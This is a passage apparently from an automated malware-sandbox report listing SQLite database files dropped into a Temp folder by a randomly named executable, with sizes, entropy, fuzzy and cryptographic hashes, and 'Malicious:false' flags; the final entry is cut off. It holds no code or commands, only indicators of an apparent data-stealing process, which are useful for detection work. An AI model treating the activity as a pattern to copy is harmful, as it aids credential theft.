                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\7i033wFP1Z

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\82MUU0qVMY

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\87AGVUyJHt

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\8EfJkJ79XL

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\8lhqFkdFAe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\8xSZ8ynR9S

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\90OgyTdeR4

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9A9UZuAKEw

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9LhG1M5Q8N

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9NVpQvLOBW

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9yarMvXQYn

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\A7x2AoAPXH

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AAnDPXuLM0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AST9ZafwSK

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Ap65OdhL5o

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\B5VLTpPk3f

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\B8EFqp5rfa

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BOQ4UUwW76

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BPjM7kIgkI

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BTj0Wn5n3x

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
